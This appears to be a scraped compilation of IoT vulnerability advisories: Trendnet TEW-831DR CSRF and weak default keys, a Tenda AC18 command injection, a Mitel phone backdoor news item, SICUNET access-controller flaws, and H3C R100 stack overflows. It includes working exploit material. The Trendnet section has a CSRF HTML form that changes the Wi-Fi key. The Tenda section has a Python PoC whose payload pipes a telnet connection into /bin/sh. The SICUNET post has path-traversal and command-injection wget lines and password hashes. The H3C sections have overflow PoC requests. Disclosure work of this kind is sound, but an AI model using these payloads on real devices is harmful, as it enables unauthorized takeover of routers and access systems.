System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30327  
Severity: High 7.6

**Summary**

Trendnet TEW-831DR WiFi router is a general consumer WiFi router with a web interface for configuration. It was found that the routers browser interface is vulnerable to CSRF.

**Impact**

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key to the WiFi router if the interface IP is known.

**Details**

Cross-Site Request Forgery is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application using the same browser. The malicious web application can send unwanted requests to the vulnerable web application.

If the user is logged into the router web interface an attacker could create a page like the example below and trick a user into clicking it to change the router WiFi pre-shared key or SSID.

e.g.:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.10.1/boafrm/formWizard" method="POST">
    
          <input type="hidden" name="pskValue0" value="password" />
          <input type="hidden" name="pskValue1" value="password" />
          <input type="hidden" name="cliPskValue0" value="password" />
          <input type="hidden" name="cliPskValue1" value="password" />
          <input type="hidden" name="apply" value="Save &amp; Apply" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30325  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is the same for every router but the last four digits.

**Impact**

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

**Details**

The device default pre-shared key has the same seven out of eleven digits for every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

    The first seven default characters of the pre-shared key:
    831R100

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should update the current wifi key to new one through the web interface.

**Disclosure Timeline:**

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022 – Trendnet released firmware version:v1.0(601.130.1.1410).

**Thanks to**

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Additionally, Trendnet for their on going cooperation.

**About NCC Group**

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

CVE-2022-30329: Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

Tenda AC18 router V15.03.05.19 and V15.03.05.05 was discovered to contain a remote code execution (RCE) vulnerability via the Mac parameter at ip/goform/WriteFacMac.

Permalink

Vendor:Tenda https://www.tenda.com.cn/default.html product:AC18 version:V15.03.05.19 and V15.03.05.05 type:Arbitrary Remote Command Execution author:WuShaoZhen institution:WuShaoZhen@Xiangtan University

**Vulnerability description:**

I found an Arbitrary Command Execution vulnerability in the router's web server-- **/bin/httpd** of squashfs filesystem. While processing the **mac** parameters for a post request(when an attacker accesses ip/goform/WriteFacMac), the value is directly passed to doSystem, which causes a RCE. The details are shown below:

Close the previous command with a semicolon and then cause an Arbitrary Remote Command Execution

**Poc:**

    import requests
    from pwn import*
    
    ip = "192.168.211.128" #You Tenda AC18 Router IP
    url = "http://" + ip + "/goform/WriteFacMac"
    print(url)
    
    
    #payload = ";cmd"
    #payload = ";telnet ip port1 | /bin/sh | telnet ip port2"
    payload = ";telnet 127.0.0.1:1111 | /bin/sh | telnet 127.0.0.1:2222"
    
    
    cookie = {"Cookie":"password=12345"}
    data = {"mac": payload}
    response = requests.post(url, cookies=cookie, data=data)
    print(response.text)
    print("HackAttackSuccess!")
    

Use the above POC to play shell through telnet You can get a very stable shell

CVE-2022-31446: Router/RCE_1.md at main · wshidamowang/Router

Cybersecurity researchers have disclosed details of two medium-security flaws in Mitel 6800/6900 desk phones that, if successfully exploited, could allow an attacker to gain root privileges on the devices.
Tracked as CVE-2022-29854 and CVE-2022-29855 (CVSS score: 6.8), the access control issues were discovered by German penetration testing firm SySS, following which patches were shipped in May

Cybersecurity researchers have disclosed details of two medium-security flaws in Mitel 6800/6900 desk phones that, if successfully exploited, could allow an attacker to gain root privileges on the devices.

Tracked as CVE-2022-29854 and CVE-2022-29855 (CVSS score: 6.8), the access control issues were discovered by German penetration testing firm SySS, following which patches were shipped in May 2022.

"Due to this undocumented backdoor, an attacker with physical access to a vulnerable desk phone can gain root access by pressing specific keys on system boot, and then connect to a provided Telnet service as root user," SySS researcher Matthias Deeg said in a statement shared with The Hacker News.

Specifically, the issue relates to a previously unknown functionality present in a shell script ("check\_mft.sh") in the phones' firmware that's designed to be executed at system boot.

"The check\_mft.sh checks if the '\*' and the '#' keys are pressed and held simultaneously at system startup," the researchers said. "After that, the static IP address 10.30.102\[.\]102 and a static root password is set and a telnet service is started."

Successful exploitation of the flaws could allow access to sensitive information and code execution. The vulnerabilities impact 6800 and 6900 Series SIP phones, excluding the 6970 model.

Users of the affected models are recommended to update to the latest firmware version to mitigate any potential risk arising out of exploiting the privilege escalation attack.

This is not the first time such backdoor features have been discovered in telecommunications-related firmware. In December 2021, RedTeam Pentesting revealed two such bugs in Auerswald's VoIP appliances that could be abused to gain full administrative access to the devices.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Disclose Rooting Backdoor in Mitel IP Phones for Businesses

A vulnerability was found in SICUNET Access Controller 0.32-05z. It has been declared as problematic. This vulnerability affects unknown code of the component Password Storage. The manipulation leads to weak encryption. Attacking locally is a requirement.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****SICUNET Physical Access Controller - Multiple Vulnerabilities**

_From_: Andrew Griffiths <agriffiths+fd () google com>  
_Date_: Wed, 8 Mar 2017 11:17:13 -0800  

SICUNET Physical Access Controller - Multiple Vulnerabilities

-------------------------------------------------------------

Introduction

============

Multiple vulnerabilities were identified in the SICUNET Access Controller
Products. The vulnerabilities were discovered during a black box security
assessment and therefore the vulnerability list should not be considered
exhaustive.

Affected Software and Versions

==============================

Known vulnerable version is 0.32-05z. This version string was taken from
Spider.db.

CVE

===

No CVEs have been assigned.

Vulnerability Overview

======================

0. SN-01: HIGH: Outdated software

1. SN-02: HIGH: PHP include()

2. SN-03: CRITICAL: Unauthenticated remote code execution

3. SN-04: CRITICAL: Hardcoded root credentials

4. SN-05: High: Passwords stored in plaintext

Vulnerability Details

=====================

------------------------

SN-01: Outdated software

------------------------

Severity: High

A variety of software running on the device is outdated, making
exploitation of certain bugs far easier than it would be had they been
patched, or running up to date software.

 /usr/local/php\_b2/bin # ./php -v

 PHP 5.2.14 (cli) (built: Jul  8 2012 22:45:11)

 Copyright (c) 1997-2010 The PHP Group

 Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

http://php.net/eol.php has more information about PHP 5.2 being End Of
Life, and associated security issues.

 /usr/local/lighttpd/sbin # ./arm-linux-lighttpd -v

 lighttpd/1.4.30 (ssl) - a light and fast webserver

 Build-Date: Dec 26 2013 15:13:53

https://www.lighttpd.net/download/ has more information about security
changes in lighttpd.

 # uname -a
 Linux SICUNET 2.6.32.9 #72 PREEMPT Tue Feb 28 15:25:12 KST 2012 armv7l
 GNU/Linux


It is recommended that software is kept up to date, and that configurations
are reviewed to ensure that they’re secure. For example, there may have
been configuration options for PHP which may have made exploitation harder.

--------------------

SN-02: PHP include()

--------------------

Severity: High

When sending a request to /, the 'c' parameter is used as part of an
include() statement.

Excerpt from /spider/web/webroot/index.php:

 $class  = Input::get('c', 'layout');
 $method = Input::get('m', 'index');

 include APP\_DIR.'/controllers/'.$class.EXT;

(where EXT is defined as '.php’).

By crafting the c parameter, it’s possible to access arbitrary files on the
device:

 wget 'http://victim.ip.address/?c=../../../../../etc/passwd%00&apos;

The %00 trick is a known issue, and is addressed in a later PHP update. For
more information, please see SN-01.

It is recommended that the code be refactored to not require passing user
supplied input to the include() function. Alternatively, a strict whitelist
approach of known modules may be used instead.

--------------------------------------------

SN-03: Unauthenticated remote code execution

--------------------------------------------

Severity: Critical

A variety of functionality is implemented via insecure string concatenation
then passed to underlying exec() functions:

For example, in card\_scan\_decoder.php

16     $No = $\_GET\['No'\];
17     $door = $\_GET\['door'\];
18
19     $result = array();
20
21     $db   = new PDO('sqlite:/tmp/SpiderDB/Spider.db');
<snip>

27
28     if ($No < 1)
29     {
30         $DelTemp = $db->prepare("DELETE FROM CardRawData");
31         $DelTemp->execute();
32
33         exec("/spider/sicu/spider-cgi getrawdata ".$door." on");
34     }

This vulnerability can be exploited by:

 wget 'http://victim.ip.address/card\_scan\_decoder.php?No=0&door=$(sleep 3)’

This is just an example of the pattern of insecurely creating strings to be
executed, and not an exhaustive listing.

It is recommended that injection-proof API's are used instead of
error-prone string concatenation, or whitelist / blacklist being used (for
example, escapeshellcmd). However, it appears as if the closest option in
PHP is http://php.net/manual/en/function.pcntl-exec.php which requires the
user to perform a lot more work to avoid shooting themselves in the foot
(such as forking the process first).

---------------------------------

SN-04: Hardcoded root credentials

---------------------------------

Severity: Critical

There are 3 password fingerprints in /etc/passwd

 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
 e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux
User,,,:/home/e3user:/bin/sh
 lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux
User,,,:/home/lighttpd:/bin/sh

The plaintext root password can be found in /spider/sicu binaries. The root
password may be used for the ftp or telnet service on the device. From our
observation, it appears as if FTP is running by default, along with the
ability to login as root via FTP.

The hardcoded root credentials are used by binaries on the system to run
commands as root. It is currently unknown what the purpose of the e3user
and lighttpd hardcoded passwords are.

For example, the root password is used in a variety of ways in the
following format:

 echo %s | su -c 'mkdir -p %s >& /tmp/message'
 echo %s | su -c 'chown %s %s >& /tmp/message'

Where %s is replaced at run time with the cleartext root password before
being passed to the system() function.

It is recommended that hardcoded credentials be removed, and instead
replaced with a more suitable mechanism. For example; sudo may be suitable,
combined with the NOPASSWD directive.

FTP access should be replaced with a more secure transfer mechanism (such
as SSH FTP, or SCP), and authentication should be managed by a user
(preferably via SSH public keys).

------------------------------------------

SN-05: Passwords stored in plaintext

------------------------------------------

Severity: High

A variety of credentials (for example, used for accessing the web front
end, or other devices part of the installation) are stored unencrypted on
the device in /tmp/SpiderDB/Spider.db:

sqlite> SELECT Name,Password FROM WebUser;
admin|ExamplePlaintextPassword
sqlite> SELECT Name,ID,Password FROM Controller;
Server|username|AnotherPlaintextPassword

It is recommended that where passwords must be stored, that they are
suitably cryptographically hashed using an appropriate standard (for more
information, please see https://password-hashing.net).

Author

======

The vulnerabilities were discovered by Andrew Griffiths from Google
Security Team.

Timeline

========

2016/12/06 - Contacted sicunet.com domain registrar, and sales () sicunet com
            for a point of contact to report security issues.

2016/12/08 - Pinged earlier email for a point of contact, additionally
            included tech () sicunet com on an email.

2016/12/08 - Report sent to Ike Huh, CEO.

2016/12/12 - Mentioned that reviewing spider-api would be worthwhile as it
            listens on port 7000, and strings suggests that there may be
            command injection / other vulnerabilities. No reply.

2017/01/17 - Asked point of contact if they had any questions about the
            advisory sent earlier. No reply.

2017/01/24 - Pinged vendor again, asked about resellers who may be able to
            make recommendations about restricting network access to the
            devices from the internet.

2017/01/30 - No contact from vendor.

2017/02/24 - Asked vendor if the affected users can expect patches. No
            reply.

2017/03/01 - Sent an email to the vendor, reminding them disclosure is
coming
            up soon.

2017/03/08 - 90 day disclosure deadline.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SICUNET Physical Access Controller - Multiple Vulnerabilities** _Andrew Griffiths (Mar 10)_

CVE-2017-20040: Full Disclosure: SICUNET Physical Access Controller

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the Asp_SetTelnet parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the param parameter is passed to V7, and then the matched content is formatted into the V8 stack through the sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/Asp_SetTelnet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    Asp_SetTelnet=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30918: IOT_vuln/H3C/magicR100/8 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the Asp_SetTelnetDebug parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the param parameter is passed to V3, and then the matched content is passed to the V5 stack through the sscanf function. There is no size check, and there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    Asp_SetTelnetDebug=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

Tag

#telnet